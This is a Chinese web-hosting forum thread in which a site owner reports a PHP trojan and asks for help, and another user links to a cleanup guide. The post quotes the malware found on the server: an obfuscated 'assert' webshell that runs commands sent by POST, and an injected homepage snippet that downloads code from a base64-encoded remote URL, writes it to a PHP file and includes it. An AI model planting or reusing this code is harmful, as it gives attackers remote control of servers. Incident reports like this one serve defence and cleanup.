asmon 发表于 2014-5-2 14:36:30

网站被上传php木马了,不知道是不是mysql的问题

<?php $k = str_replace("8","","a8s88s8e8r8t");$k($_POST["8"]); ?>

网站目录生成了这个php文件,首页文件也被插入了下面的代码:
}ob_start();readfile (base64_decode("aHR0cDovL3d3dy41c3V5LmNvbS9iZXQvZXhjYW51LnR4dA"));$img = ob_get_contents ();ob_end_clean ();$d=base64_decode(Z2FsbGFyeS5waHA);if(file_exists("$d")){@require($d);}else{$fp2 = @fopen ( "$d", "a" );fwrite ( $fp2, $img );fclose ( $fp2 );}

asmon 发表于 2014-5-2 14:41:03

http://hi.baidu.com/jiying/item/04825da7991bad706dd45562

licess 发表于 2014-5-3 10:07:44

可以参考https://bbs.vpser.net/viewthread.php?tid=9154&;page=1&fromuid=3#pid26768这个查找
具体什么原因导致的不好说
页: [1]
查看完整版本: 网站被上传php木马了,不知道是不是mysql的问题